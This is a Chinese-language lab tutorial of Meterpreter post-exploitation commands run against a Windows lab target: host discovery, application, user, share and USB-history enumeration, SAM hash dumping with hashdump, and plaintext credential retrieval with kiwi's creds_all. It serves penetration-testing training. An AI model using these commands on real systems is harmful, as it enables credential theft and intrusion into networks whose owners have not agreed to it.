一、存活主机发现
步骤1、使用arp查看缓冲表:
meterpreter > arp
data:image/s3,"s3://crabby-images/7dea0/7dea0f239ee1cc5999782f44163b1eac51a1cc33" alt=""
步骤2、局域网内存活主机发现:
meterpreter >
run post/windows/gather/arp_scanner RHOSTS=172.16.0.0/24
data:image/s3,"s3://crabby-images/f939b/f939b56c853f89e73f19fff48992749c472b046a" alt=""
二、应用程序枚举
方法1: 获取靶机上的软件安装信息
meterpreter > run post/windows/gather/enum_applications
data:image/s3,"s3://crabby-images/b5e66/b5e6614e94e1c5ab5a64c1eccfaf98d3478e4c01" alt=""
靶机上安装百度网盘应用后再检测:
data:image/s3,"s3://crabby-images/35afa/35afabf552dcf0695a99bd7be883506c1910dd59" alt=""
方法2: 获取靶机最近访问过的文档、链接等信息
meterpreter >
run post/windows/gather/dumplinks
data:image/s3,"s3://crabby-images/5cb71/5cb7155f44cfee58f6f942fa611dcab5aaf479a1" alt=""
三、查看最近登录的用户
meterpreter > run post/windows/gather/enum_logged_on_users
data:image/s3,"s3://crabby-images/cad34/cad34352009e16a91838e6168e78a8ed3c72c0e8" alt=""
四、查看共享文件
靶机上查看共享:
data:image/s3,"s3://crabby-images/fb3c7/fb3c77353272e9dcec50edc37c8f17f2c62fb5db" alt=""
kail攻击机上:
meterpret >
run post/windows/gather/enum_shares
data:image/s3,"s3://crabby-images/d94f0/d94f0ee43ac6d54532f436eb2c21725736008c58" alt=""
五、查看用户hash
机制:从SAM数据库导出密码的哈希
方法1:
hashdump
data:image/s3,"s3://crabby-images/87448/874484a85a24126eb7969b38ccfe66147808fefb" alt=""
方法2:
meterpreter > run post/windows/gather/hashdump
data:image/s3,"s3://crabby-images/8013f/8013f162ae62fb38cfc15f30de4dddea9e09ac3c" alt=""
得到用户的密码与对应的hash值。
六、查看usb历史记录
meterpreter > run post/windows/gather/usb_history
data:image/s3,"s3://crabby-images/22b55/22b558a44842ff3d2b76cba64e675091a9f318fd" alt=""
没有usb设备使用记录。
给靶机添加一个usb设备:
data:image/s3,"s3://crabby-images/bc943/bc9435406bab039dd5b16e8a4c3944b415605950" alt=""
data:image/s3,"s3://crabby-images/73b52/73b52b687072c52e705f0177b5dd4d2cf6b6ce8e" alt=""
此时,再查看usb历史记录:
data:image/s3,"s3://crabby-images/392e9/392e985d129e051826c5e0074cc3f17238bcfe50" alt=""
七、获取用户明文认证信息
加载模块:
meterpret > load kiwi
data:image/s3,"s3://crabby-images/c70fa/c70fad5525dbffad4424211145c3e62aef4bdc50" alt=""
查看指令集:
help
data:image/s3,"s3://crabby-images/ce3d5/ce3d5328db95d5c222594be45190c698cfc951a4" alt=""
获取所有认证信息
:creds_all
data:image/s3,"s3://crabby-images/a362c/a362c348a5e4179ec6c2ff7503f59150e5254ad7" alt=""
八、参考
4-30 后渗透测试实验 - 主机敏感信息泄露防御_哔哩哔哩_bilibili
4-31 Windows系统后渗透测试常用模块 - 主机发现_哔哩哔哩_bilibili
4-32 Windows系统后渗透测试常用模块 - 应用程序枚举_哔哩哔哩_bilibili
4-33 Windows系统后渗透测试常用模块 - 收集信息_哔哩哔哩_bilibili
4-35 Windows后渗透测试插件-获取用户明文认证信息_哔哩哔哩_bilibili